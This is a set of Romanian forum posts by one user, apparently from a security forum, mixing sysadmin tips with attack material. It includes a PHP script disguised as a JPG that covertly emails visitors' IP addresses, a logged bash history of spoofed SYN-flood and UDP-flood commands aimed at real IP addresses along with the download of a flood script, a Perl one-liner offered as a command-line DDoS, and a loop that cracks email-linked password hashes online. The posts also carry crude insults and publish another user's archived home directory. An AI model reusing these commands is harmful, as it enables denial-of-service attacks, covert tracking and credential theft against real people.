aelius

Metoda 1. hp poze # cat .htaccess AddType application/x-httpd-php .php .jpg hp poze # cat bunaciune.jpg <?php header("Content-type: image/jpg"); echo fopen("http://img802.imageshack.us/img802/8550/2152250740f0662ce25ao.jpg", "r"); mail("gigi@adresamea.ro", "ip fraier", ip fraier: $_SERVER["REMOTE_ADDR"]); ?> hp poze # - Fisierul .jpg este procesat ca php. - Doar dati link-ul pe messenger, url/bunaciune.jpg si primiti pe email adresa ip. nu trebuie sa dea click Metoda 2. Stai cu tail -f pe log-ul de la apache, si dai cu link-ul cu orice poza, nu e nevoie sa dea click si va apare adresa ip in log.

@Fed0t: ignore_user_abord -> asta da ignore la userul ... de la bordul vaporului ? (e abort) shell_exec -> este pusa de doua ori. exec -> lipseste

@bcman: Private scrie la toate sculele, si totusi sunt pe web. @J: Merci, m-ai facut fericit, doar ca era sa vars cafeaua pe mine )

LOLL )) ) Nu e virus, e poza lu pax in pana mea acolo, pe aia o vede antivirusul )

lol, nu am stat sa ma uit. Acum arunc o privire sa-i vad mecla

Sunt timeouti mici pe web, 'wget -c' sau puteti lua de aici: https://www.rtfm.ro/pax.tgz ; Oricum nu am idee daca e ceva bun in homedir-ul ratatului

@Zatarra: Pax este. Eu rad si acum de ratat

A fost odata un ratat ce cotrobaia pe forum pe aici si il chema pax. Cu cateva luni in urma, mi-a zis ca nu are si el pe ce sa lucreze la diverse scripturi (php stuff), si avand un morman de servere acasa pe care lucrez, fac teste, benchmark-uri, i-am adaugat un account pe unul din servere. Aseara ma uitam sa fac ce face ratatul acolo: hp ~ # w 11:46PM up 8 days, 10:52, 3 users, load averages: 1.67, 1.70, 1.50 USER TTY FROM LOGIN@ IDLE WHAT root pts/0 workstation Sat09AM - w root pts/1 workstation 11:36PM 7 -bash (bash) pax pts/2 89.114.232.245 11:00PM 46 perl udp.pl 93.115.122.233 0 0 M-am uitat prin bash history sa vad ce sloboz face saracia acolo, si in afara de faptul ca "lucra" la cate ceva (stie php cum stia bunica-mea blowjob) am vazut astea: 3293 2011-11-26 21:46:13 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP93.115.122.233 3294 2011-11-26 21:46:15 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP 3295 2011-11-26 21:46:18 hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP 3296 2011-11-26 21:46:52 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source 93.115.122.233 3297 2011-11-26 21:47:02 hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233 3298 2011-11-26 21:47:12 sudo hping -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --rand-source 93.115.122.233 3304 2011-11-26 21:51:48 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048 3305 2011-11-26 21:52:52 hping 93.115.122.233 --rand-source -S --destport 445 --faster --debug -w 2048 3235 2011-11-20 14:55:55 perl udp.pl 78.97.149.15 80 80 3236 2011-11-20 14:56:30 perl udp.pl 78.97.149.15 80 800 3237 2011-11-20 14:57:05 perl udp.pl 78.97.149.15 80 800 & 3238 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 & 3239 2011-11-20 14:57:08 perl udp.pl 78.97.149.15 80 800 & 3240 2011-11-20 14:57:10 perl udp.pl 78.97.149.15 80 800 & 3241 2011-11-20 14:57:15 perl udp.pl 78.97.149.15 80 800 & 3242 2011-11-20 14:57:20 perl udp.pl 78.97.149.15 80 800 & 3222 2011-11-20 14:43:55 curl http://lasemafor.ro/udp.pl -O udp 3223 2011-11-20 14:44:05 ls 3224 2011-11-20 14:44:17 curl http://lasemafor.ro/udp.pl -O x 3225 2011-11-20 14:44:24 curl lasemafor.ro/udp.pl -O x 3226 2011-11-20 14:44:28 curl lasemafor.ro/udp.pl -o x 3320 2011-11-27 19:02:56 pl udp.pl 79.112.84.177 0 0 3321 2011-11-27 19:03:01 perl udp.pl 79.112.84.177 0 0 3322 2011-11-27 19:04:32 netstat 3323 2011-11-27 19:04:40 ping 79.112.84.117 3324 2011-11-27 19:06:31 echo plm 3325 2011-11-27 19:06:57 ping google.ro 3326 2011-11-27 19:07:25 ping 89.114.232.245 3327 2011-11-27 19:20:24 ping 79.112.84.117 3328 2011-11-27 23:00:33 perl udp.pl 93.115.122.233 0 0 Si astea: (nu stiu cat de ratat poate sa fie sa de yum/apt-get/aptitude pe un FreeBSD, plus ca era user.) 3257 2011-11-25 13:58:35 yum install htop 3258 2011-11-25 13:58:40 apt-get install htop 3259 2011-11-25 13:58:49 aptitude install htop Am sters account-ul la trotineta asta cu pedale, i-am arhivat directorul home si l-am pus aici, ca poate sunt necesare la cineva. www.rstcenter.com/pax.tgz Poftiti lupii mei, e moca!

Vorbeste la Epayment (e gecad), romanesc, etc. (este "reseller" la romcard)

Bun post, Se mai poate folosi si lsof sau sockstat in loc de netsat

Pe torente romanesti o sa gasesti rahaturi de manele. Doar in Romania se poate ca Ciprian Porumbescu sa aibe 3000 views pe youtube, iar Salam 6 milioane. Cauti dupa nume, nu cu "mari compozitori", exemplu: Download beethoven Torrents - KickassTorrents

Iti da eroare ca e poza prea mica ? Eu cred ca iti da ca o ai prea mica. Doamne fereste ... Citeste aici: mod_mime - Apache HTTP Server # cam singura cale prin care un fisier cu extensie .jpg poate fi procesat ca php.

Salut, Site-ul nu functioneaza, si e logic din moment ce domeniul ... nu este inregistrat. Probabil domeniul este metin2legends.ro Poate te ajuta asta: https://www.rtfm.ro/diverse/sfaturi-pentru-optimizarea-unui-site-web/

// offtopic Just kidding. Eu am history si de acum 2 ani. Maresc HISTSIZE, HISTFILESIZE si modific HISTTIMEFORMAT pentru a vedea data exacta. // ontopic DDoS din CLI cu perl. perl -e 'use Socket; socket(rtfm, PF_INET, SOCK_DGRAM, 0); for ( { send(rtfm, 0, 0, sockaddr_in(80, inet_aton("10.0.0.12"))); }'

Ma futuva-n parastas, ce e acia, microsoft.com. Omul a pus un rahat de program moca, daca-ti foloseste il iei, daca nu, dai alt+f4. Nu cumva vrei si suport tehnic prin ticketing/email/telefon si CD cu ala trimis prin posta ? Ce vrei sa-ti dea la el, sa-ti declare IUBIRE vesnica ?

Spam topic ? Decodeaza pe fata lu basescu ... Daca le ia cu foreach, cum saracia poti spune "in acelasi timp ?" Ce saracia atata chin hp ~ # cat texte [email]cristi@yahoo.com[/email] 06709f6e49eb68dd97c9087a61f3252d [email]ionut@yahoo.com[/email] a709a02347a77a977feb2528c19b911f [email]vasile@yahoo.com[/email] e3fced4c8e7e561d58a46a29ac492749 hp ~ # for i in `awk -F " " '{ print $2 }' texte`; do curl http://md5.hashcracking.com/search.php?md5=$i && echo "";done No results returned. Cleartext of a709a02347a77a977feb2528c19b911f is elefant Cleartext of e3fced4c8e7e561d58a46a29ac492749 is elieli hp ~ #

Frate, bine ca nu ai zis: )

Screenshot la consola, cand suntem conectati remote, prin ssh: vidcontrol -p < /dev/ttyv0 | scr2png -v > screenshot.png

Generare de parole sigure din CLI: tr -dc A-Za-z0-9_ < /dev/urandom | head -c 20 | xargs openssl rand -base64 12 openssl rand -base64 37 | cut -c1-37 openssl rand -base64 37 | sed -e 's/^\(.\{37\}\).*/\1/g' openssl rand -base64 37 | awk 'BEGIN{FS=""} {for (i=1;i<=37;i++) printf("%s",$i);} {printf "\n"}'

Simple http server cu python. Se listeaza pe port 8000 si este util cand dorim sa punem ceva disponibil pe web, fara a avea apache sau alt daemon instalat. python -c "import SimpleHTTPServer;SimpleHTTPServer.test()" Acelasi lucru, insa se listeaza pe port 80 python -m SimpleHTTPServer 80

@Anubis77: Daca ai linux, fie el si pe un virtualbox ceva, poti converti cu ffmpeg sau mencoder. Cel mai simplu este cu ffmpeg, faci ce dimensiune vrei, bitrate, frame-uri pe secunda si altele ..

@eth0: Descarcarea condesatorilor, daca au cel putin 50 de microfarazi, te omoara. Este foarte violenta si amperajul este mare. @AhEaD: Nu rezolvi nimic cu un sistem de genul, pur si simplu o sa-i curenteze, si de nervi, cel mai probabil iti arunca o caramida in parbriz. De asemenea, asigurarea nu este o solutie, pentru ca daca iti fura cineva o oglinda, o sa colinzi cu saptamanile pentru asigurare, pierzi si timp si bani, iti faci si nervi de pomana. Atata timp cat maneaua, spartul semintelor, panaramele despuiate si hotia sunt la rang de cinste in Romania, slabe sanse sa poti face ceva.

Dude, ai impresia ca rstcenter este instanta judecatoreasca? Vezi tu vreun nume la baieti aici? (in afara de al meu). Cum folosesti ceva impotriva unui X necunoscut dupa un forum? ps: sa nu zici ca asta esti tu: hi5 - Fotografiile lui George

@l34k: Imaginea mica descrie totul, meserie de shaormar. Mai @Cobbra, fara nicio suparare, dar ce e cu atatea sorcove colorate si tiganesti acolo? Ai scris si "Copyright" pe imagine. Cand a fost inregistrata la OSIM ? Sunt de parere ca un site pentru o comunitate de genul, ar trebui sa fie cat mai curat, fara flori, sorcove, pupicei, trifoi, imagini si brizbrizuri multe. In fond, ce se scrie conteaza, el trebuie sa ramana cum se faceau odata tutorialele "just old plain text" Poti face diferenta intre Romanian Security Team - [ Security Research ] v.2.0 Alpha si [RST] Romanian Security Team - Security Research

Salut, Ceva de genul: <?php // ............. restul de cod .... $ch = curl_init(); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 45); curl_setopt($ch, CURLOPT_MAXREDIRS, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 600); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_AUTOREFERER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // autentificare curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_URL, "https://www.gigel.ro/login.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "login=$user&password=$password"); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_exec($ch); // URL si POSTFIELDS sunt ca exemplu // Liniile cu SSL sunt utile daca URL-ul este pe https // ........... restul de cod ...... ?> Cred ca este necesar si chmod 777 pe cookie.txt, depinde sub ce user rulezi scriptul si daca are permisiune de scriere pe fisier.